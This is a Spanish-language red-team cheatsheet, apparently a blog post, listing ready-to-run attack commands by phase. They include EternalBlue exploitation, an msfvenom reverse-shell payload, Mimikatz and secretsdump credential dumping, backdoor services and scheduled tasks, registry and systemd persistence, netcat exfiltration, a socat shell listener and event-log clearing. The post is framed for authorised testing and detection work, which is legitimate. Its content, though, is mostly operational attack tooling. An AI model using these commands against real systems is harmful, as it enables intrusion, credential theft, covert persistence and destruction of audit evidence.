Introducción

Los ejercicios de Red Team permiten evaluar la resiliencia operativa y técnica de una organización frente a adversarios que emplean técnicas realistas y persistentes. A diferencia de un pentest puntual, un Red Team simula campañas complejas que cubren todo el ciclo de intrusión: desde el reconocimiento inicial hasta la persistencia y exfiltración.

Este cheatsheet recopila comandos prácticos y patrones de uso para cada fase del ciclo ofensivo, diseñado como referencia rápida para profesionales en entornos controlados y con autorización formal.

⚠️ Aviso ético: todo el material descrito en este post debe emplearse exclusivamente en escenarios autorizados (contratos, ejercicios internos o laboratorios). El uso no autorizado de estas técnicas es ilegal y dañino.

Desarrollo técnico

A continuación se presentan comandos y ejemplos organizados por fase. Los snippets son representativos: adáptalos al contexto del ejercicio y respeta las políticas de alcance y autorización.

1. Reconocimiento / información pública

Recolección de información disponible públicamente para entender la superficie de ataque.

          whois example.com
dig +short example.com
dig ANY example.com @8.8.8.8
nslookup -type=mx example.com 8.8.8.8
curl '<https://crt.sh/?q=%25.example.com>' -s
theHarvester -d example.com -l 500 -b all
gobuster dns -d example.com -w subdomains.txt -t 50
recon-ng --modules

        
2. Descubrimiento de puertos y servicios

Inventariado de servicios expuestos y detección de versiones.

          nmap -sC -sV -oA scan/example 10.0.0.0/24
nmap -T4 -A -p- --min-rate=1000 -oA fastscan target.com
masscan -p1-65535 --rate=10000 10.0.0.0/8 -oG masscan.txt
smbclient -L \\TARGET -U ''
enum4linux -a TARGET
smbmap -H target -u user -p pass
rpcclient -U '' TARGET -c 'enumdomusers'
ldapsearch -x -H ldap://target -b 'dc=corp,dc=local' '(objectClass=*)'

        
3. Fuerza bruta y cracking de credenciales

Técnicas para validar contraseñas débiles y extraer hashes.

          hydra -l administrator -P passwords.txt smb://TARGET
medusa -h target -u admin -P passlist -M ssh
hashcat -m 1000 hashes.txt rockyou.txt --force
john --wordlist=rockyou.txt --format=NT hashes.txt
impacket-secretsdump domain/creds@DC

        
4. Explotación y payloads

Uso de exploits conocidos y generación de payloads personalizados.

          msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
run

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe > shell.exe
searchsploit MS17-010
sqlmap -u '<https://target/page?id=1>' --batch --dump

        
5. Post-explotación (Windows y Active Directory)

Escalada de privilegios, recolección de credenciales y mapeo de relaciones de confianza.

          # Mimikatz (interactivo)
privilege::debug
sekurlsa::logonpasswords
lsadump::sam

# Impacket / ejecución remota
psexec.py -hashes LM:NTLM domain/user@target
wmiexec.py user:pass@target
secretsdump.py domain/Administrator@DC -outputfile:creds

# Recolección y análisis de grafos
SharpHound.exe -c All
# Analizar en BloodHound UI

# Kerberos attacks
Rubeus.exe kerberoast
Invoke-Kerberoast -Verbose

        
6. Movimiento lateral y ejecución remota

Técnicas para pivotar y ejecutar código en hosts remotos.

          crackmapexec smb 10.0.0.0/24 -u users -p 'P@ssw0rd' --shares
schtasks /create /s TARGET /u DOMAIN\\Admin /p 'Pass' /tn 'Updater' /tr 'C:\\Windows\\Temp\\backdoor.exe' /sc once /st 00:00
sc \\\\TARGET create MySrv binPath= "C:\\payload.exe" start= auto
Enter-PSSession -ComputerName target -Credential (Get-Credential)

        
7. Persistencia

Mecanismos comunes para mantener acceso tras reinicios o auditorías.

          # Registry autorun (Windows)
reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d "C:\\windows\\temp\\updater.exe" /f

# Tarea programada
schtasks /create /sc daily /tn 'Updater' /tr 'C:\\windows\\temp\\upd.exe' /st 12:00

# systemd (Linux)
cat > /etc/systemd/system/backdoor.service <<EOF
[Unit]
Description=back
[Service]
ExecStart=/usr/bin/python3 /opt/backdoor.py
Restart=always
EOF
systemctl enable --now backdoor.service

        
8. Exfiltración y herramientas de red

Técnicas y utilidades para extraer información con discreción.

          nc -lvnp 4444
nc target 80 < exfil.zip
socat TCP-LISTEN:4444,fork EXEC:/bin/bash
curl -o /tmp/file <http://10.0.0.5/file>
wget <http://10.0.0.5/file> -O /tmp/file
tcpdump -i eth0 -w traffic.pcap
tshark -r traffic.pcap -Y 'http'

        
9. Web & fuzzing

Descubrimiento de directorios y recursos web.

          ffuf -u <https://target/FUZZ> -w wordlist.txt -t 50 -mc 200,301
gobuster dir -u <https://target> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Burp Suite: Proxy, Repeater, Intruder y extensiones

        
10. Limpieza y OPSEC (básico)

Acciones de remediación (únicamente en ejercicios autorizados) y minimización de huella.

          # Ejemplo: limpiar eventos Windows (altamente detectable; usar solo en laboratorio autorizado)
wevtutil cl System
# Eliminar persistencias, restaurar cambios de configuración y retirar herramientas

        

Aplicaciones / Impacto

  • Red Teams : acelera la ejecución de campañas controladas y mejora la reproducibilidad de técnicas durante ejercicios.
  • Blue Teams : al conocer comandos y patrones ofensivos, pueden mejorar reglas de detección, alertas y playbooks de respuesta.
  • Auditores y gestores de riesgo : facilitan la priorización de controles técnicos y la evaluación del impacto real de vectores explotables.

Integrar estas operaciones con marcos como MITRE ATT&CK permite mapear técnicas a controles detectivos y preventivos y obtener métricas accionables de madurez.


Conclusión

El uso responsable y autorizado de técnicas ofensivas es una palanca poderosa para mejorar la postura defensiva de una organización. Este cheatsheet ofrece una referencia práctica para diseñar escenarios, validar controles y cerrar brechas. Recomendación: automatizar recolección de telemetría durante los ejercicios y correlacionarla con detecciones para cerrar brechas opérationales.


Fuentes

  • MITRE ATT&CK — Framework de tácticas y técnicas.
  • NIST SP 800-115 — Technical Guide to Information Security Testing and Assessment .
  • OWASP Testing Guide.
  • Cheatsheet: Comandos útiles para Red Team. fileciteturn7file4